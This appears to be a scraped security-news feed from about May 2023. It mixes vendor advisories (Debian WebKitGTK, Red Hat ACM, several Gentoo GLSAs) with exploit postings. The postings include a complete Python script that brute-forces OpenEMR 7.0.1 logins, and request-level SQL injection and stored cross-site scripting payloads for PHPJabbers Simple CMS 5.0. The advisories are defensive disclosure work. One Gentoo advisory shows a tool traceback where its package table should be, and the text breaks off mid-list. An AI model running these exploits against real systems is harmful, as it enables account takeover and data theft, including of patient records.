OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

Debian Linux Security Advisory 5396-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. Luan Herrera discovered that an HTML document may be able to render iframes with sensitive user information. P1umer and Q1IQ discovered that processing maliciously crafted web content may lead to arbitrary code execution. An anonymous researcher discovered that processing maliciously crafted web content may bypass Same Origin Policy. Clement Lecigne and Donncha O Cearbhaill discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 03, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2022-0108 CVE-2022-32885 CVE-2023-27932 CVE-2023-27954  
                 CVE-2023-28205

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2022-0108

    Luan Herrera discovered that an HTML document may be able to  
    render iframes with sensitive user information.

CVE-2022-32885

    P1umer and Q1IQ discovered that processing maliciously crafted web  
    content may lead to arbitrary code execution.

CVE-2023-27932

    An anonymous researcher discovered that processing maliciously  
    crafted web content may bypass Same Origin Policy.

CVE-2023-27954

    An anonymous researcher discovered that a website may be able to  
    track sensitive user information.

CVE-2023-28205

    Clement Lecigne and Donncha O Cearbhaill discovered that  
    processing maliciously crafted web content may lead to arbitrary  
    code execution. Apple is aware of a report that this issue may  
    have been actively exploited.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.40.1-1~deb11u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRSI5kACgkQAAyEYu0C  
2AJ8pxAAhwQbCnrdpJ7dl7gU1Yz/nkz1e3Nb9T5u5J32v85uqXj5KPRrtGFTi+uG  
dObt0lPep1Sn07G4wR2WU9SSc8/OPWpEmil0ULHof+YUDA0JVAi0fPT+EL8MFZpa  
H7xKUYYdyVh12wN56yEB7zz698SdrrB32XKfrcQZk5SlbNYaFAGzKhfkhWn/sDmo  
c9XgjH8WULLDpjeU9qRNFmMfw16WWzxuX6JPhyLFxKoT513y1ojEU/zBEqPb/J44  
gD60Kv8qBdgvYzP2VIWm7zX0O3fp5mrkxaBPhpwfaFdG3dBUHm6MzFY/PX5uMXjE  
ZkSUmlTW/pf4pfVkT0w+coDc4kT03QDLIZiY2Z1tn6HHNxNJRcpDq074l+NGIWfb  
SNoJJjbB+t0FAyCvlRuKrd09bsYDexuf/T61dTiWGp5t1AHs3ylBZ7raSCh58iN1  
u0H77NOLXjmNzbNYCCvPHKJukn38GmOTve4ZpFiZqym5X3bZ0/Xv33isnBxqLHoc  
8XJHL57qxIW7ls+yY5rqAUWeRzePZTd1lq3CEWKA/8wUxlEdFKZO2eHtdCykasR3  
8vNyMH77LjGaNdc9pORJv/UVLUcZ8qEeuNKyFYeuhuok6lY5EQBGwAeVVyJNj0Py  
0GufP85ZEdeBL9eKRSBeVJDClm111vJDhtAc57SyTgVSS/5jUoY=  
=xARY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-1

Red Hat Security Advisory 2023-2083-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.5 General Availability release images, which fix bugs and security updates container images. Issues addressed include denial of service and server-side request forgery vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Advanced Cluster Management 2.6.5 security updates and bug fixes  
Advisory ID:       RHSA-2023:2083-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2083  
Issue date:        2023-05-02  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-3841   
                   CVE-2022-4269 CVE-2022-4304 CVE-2022-4378   
                   CVE-2022-4415 CVE-2022-4450 CVE-2022-25881   
                   CVE-2022-40897 CVE-2022-45061 CVE-2022-48303   
                   CVE-2023-0215 CVE-2023-0266 CVE-2023-0286   
                   CVE-2023-0361 CVE-2023-0386 CVE-2023-23916   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.5 General  
Availability release images, which fix bugs and security updates container  
images.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.5 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix(es):  
* CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service  
(ReDoS) vulnerability  
* CVE-2022-3841 RHACM: unauthenticated SSRF in console API endpoint

Jira issues addressed:  
* ACM-3516: ACM 2.6.5 images

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation for details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online

4. Bugs fixed (https://bugzilla.redhat.com/):

2139426 - CVE-2022-3841 RHACM: unauthenticated SSRF in console API endpoint  
2165824 - CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability

5. JIRA issues fixed (https://issues.jboss.org/):

ACM-3516 - ACM 2.6.5 Images

6. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-3841  
https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-25881  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFFOn9zjgjWX9erEAQj+jQ//SEjgQpVdMTwbzqrKnwWrIuGaZpgduNIV  
KWh4YtsCRxkPOdEw2JXDu1ApTJjCrAmd4VCPmsKdYfsWqeIrLlTgOxjL8P31uoSG  
B6wP2CDYC93KD0ucier97XWAMpM8MToFJqD7aKRwZaJRUeR7hySx/5mS5BqLsyay  
Bm0sc4Fo6W7qjTPp9/NKQhx/f1zkR3dpXit+Y9BfhPZMJan4BksEHx4j4qFv3J+g  
GN+KNQb3wu1GvOQB6dt8VEeCZaLUf3iiCAOLaYLjUnj4SH4qpeMYb7Fslc4nbRuQ  
KtuBzvL5a3FN6XcQ6bfanU+WHchn2qmHCB7oocdDY3kPjUOqiUdU5NDE9ix7eHCh  
MeBADYXfYo65BnRFGqBer7y6YcNEFO4S0mJOWcACcfBeOVt3NcN+wruWCWO8Wagm  
Fi6XQmop+uRFZlUeYtOXdDTtifZuZW9+fpzTCddZMK9oAmc4n4J0WSmpuaE0k9YW  
gJ6Gi0gsq/B68l3XblYpXg+kORJpIt5aFAbrirM7pUk3KdxI+lHA9S9UVxZR1v1g  
13tHm9rcFeX0y4JGY47SPiOYIruE9MS1/6UTK4ceqIHmfO6+ghDEwzyI9dui1hCu  
YnxE0t3ppVL3DT1tlonLs+hRNssByTtvcAbxej50s4mj9Hpr+Ar3wsd1+gEH93pJ  
bqaQqtqDjvM=  
=g85t  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2083-01

Gentoo Linux Security Advisory 202305-15 - Multiple vulnerabilities have been discovered in systemd, the worst of which could result in denial of service.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: systemd: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #880547, #830967  
       ID: 202305-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in systemd, the worst of  
which could result in denial of service.

Background  
==========

A system and service manager.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
Traceback (most recent call last):  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 326, in generate_mail_table  
    return self._generate_mail_table()  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 297, in _generate_mail_table  
    vuln.range_types_rev[vuln.pkg_range], vuln.version  
KeyError: None

Description  
===========

Multiple vulnerabilities have been discovered in systemd. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All systemd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/systemd-251.3"

All systemd-utils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/systemd-utils-251.3"

Gentoo has discontinued support for sys-apps/systemd-tmpfiles, sys-  
boot/systemd-boot, and sys-fs/udev. See the 2022-04-19-systemd-utils  
news item. Users should unmerge it in favor of sys-apps/systemd-utils on  
non-systemd systems:

  # emerge --ask --depclean --verbose "sys-apps/systemd-tmpfiles" "sys-boot/systemd-boot" "sys-fs/udev"  
  # emerge --ask --verbose --oneshot ">=sys-apps/systemd-utils-251.3"

References  
==========

[ 1 ] CVE-2021-3997  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3997  
[ 2 ] CVE-2022-3821  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3821

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-15

Gentoo Linux Security Advisory 202305-14 - A vulnerability has been discovered in uptimed which could result in root privilege escalation. Versions less than 0.4.6-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: uptimed: Root Privilege Escalation  
     Date: May 03, 2023  
     Bugs: #630810  
       ID: 202305-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in uptimed which could result in  
root privilege escalation.

Background  
==========

uptimed is a system uptime record daemon that keeps track of your  
highest uptimes.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-misc/uptimed           < 0.4.6-r1                >= 0.4.6-r1

Description  
===========

Via unnecessary file ownership modifications in the pkg_postinst ebuild  
phase, the uptimed user could change arbitrary files to be owned by the  
uptimed user at emerge-time.

Impact  
======

The uptimed user could achieve root privileges when the uptimed package  
is emerged.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All uptimed users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-misc/uptimed-0.4.6-r1"

References  
==========

[ 1 ] CVE-2020-36657  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36657

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-14

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-14

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

PHPJabbers Simple CMS 5.0 SQL Injection

PHPJabbers Simple CMS version 5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Steps to Reproduce ###- Please login from this address:https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin- Click on the "Add Section" button.- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the"Section" box and save it.- Boom! An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreateHTTP/1.1Host: localhostCookie: pj_sid=PJ1.0.6199026527.1682777172;pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;pjd=7l9bb4ubmknrdbns46j7g5cqn7User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 371Origin: https://localhostReferer:https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closesection_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

PHPJabbers Simple CMS 5.0 Cross Site Scripting

Gentoo Linux Security Advisory 202305-12 - A vulnerability has been discovered in sudo which could result in root privilege escalation. Versions less than 1.9.12_p2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: sudo: Root Privilege Escalation  
     Date: May 03, 2023  
     Bugs: #891335  
       ID: 202305-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in sudo which could result in root  
privilege escalation.

Background  
==========

sudo allows a system administrator to give users the ability to run  
commands as other users.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-admin/sudo             < 1.9.12_p2              >= 1.9.12_p2

Description  
===========

The sudoedit (aka -e) feature mishandles extra arguments passed in the  
user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR),  
allowing a local attacker to append arbitrary entries to the list of  
files to process.

Impact  
======

The improper processing of user's environment variables could lead to  
the editing of arbitrary files as root, potentially leading to root  
privilege escalation.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All sudo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.12_p2"

References  
==========

[ 1 ] CVE-2023-22809  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22809

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-12

Gentoo Linux Security Advisory 202305-11 - Multiple vulnerabilities have been found in Tor, the worst of which could result in denial of service. Versions less than 0.4.7.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tor: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #808681, #852821, #890618  
       ID: 202305-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Tor, the worst of which  
could result in denial of service.

Background  
==========

Tor is an implementation of second generation Onion Routing, a  
connection-oriented anonymizing communication service.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-vpn/tor                < 0.4.7.13                >= 0.4.7.13

Description  
===========

Multiple vulnerabilities have been discovered in Tor. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tor users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-vpn/tor-0.4.7.13"

References  
==========

[ 1 ] CVE-2021-38385  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38385  
[ 2 ] CVE-2022-33903  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33903  
[ 3 ] CVE-2023-23589  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23589  
[ 4 ] TROVE-2021-007  
[ 5 ] TROVE-2022-001  
[ 6 ] TROVE-2022-002

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-11

Gentoo Linux Security Advisory 202305-10 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 109.0.5414.74-r1>= are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #876855, #878825, #883031, #883697, #885851, #890726, #886479, #890728, #891501, #891503  
       ID: 202305-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/chromium        < 109.0.5414.74-r1>= 109.0.5414.74-r1  
  2  www-client/chromium-bin    < 109.0.5414.74      >= 109.0.5414.74  
  3  www-client/google-chrome   < 109.0.5414.74      >= 109.0.5414.74  
  4  www-client/microsoft-edge  < 109.0.1518.61      >= 109.0.1518.61

Description  
===========

Multiple vulnerabilities have been discovered in Chromium, Google  
Chrome, Microsoft Edge. Please review the CVE identifiers referenced  
below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-109.0.5414.74-r1"

All Chromium binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-bin-109.0.5414.74"

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-109.0.5414.74"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-109.0.1518.61"

References  
==========

[ 1 ] CVE-2022-3445  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3445  
[ 2 ] CVE-2022-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3446  
[ 3 ] CVE-2022-3447  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3447  
[ 4 ] CVE-2022-3448  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3448  
[ 5 ] CVE-2022-3449  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3449  
[ 6 ] CVE-2022-3450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3450  
[ 7 ] CVE-2022-3723  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3723  
[ 8 ] CVE-2022-4135  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4135  
[ 9 ] CVE-2022-4174  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4174  
[ 10 ] CVE-2022-4175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4175  
[ 11 ] CVE-2022-4176  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4176  
[ 12 ] CVE-2022-4177  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4177  
[ 13 ] CVE-2022-4178  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4178  
[ 14 ] CVE-2022-4179  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4179  
[ 15 ] CVE-2022-4180  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4180  
[ 16 ] CVE-2022-4181  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4181  
[ 17 ] CVE-2022-4182  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4182  
[ 18 ] CVE-2022-4183  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4183  
[ 19 ] CVE-2022-4184  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4184  
[ 20 ] CVE-2022-4185  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4185  
[ 21 ] CVE-2022-4186  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4186  
[ 22 ] CVE-2022-4187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4187  
[ 23 ] CVE-2022-4188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4188  
[ 24 ] CVE-2022-4189  
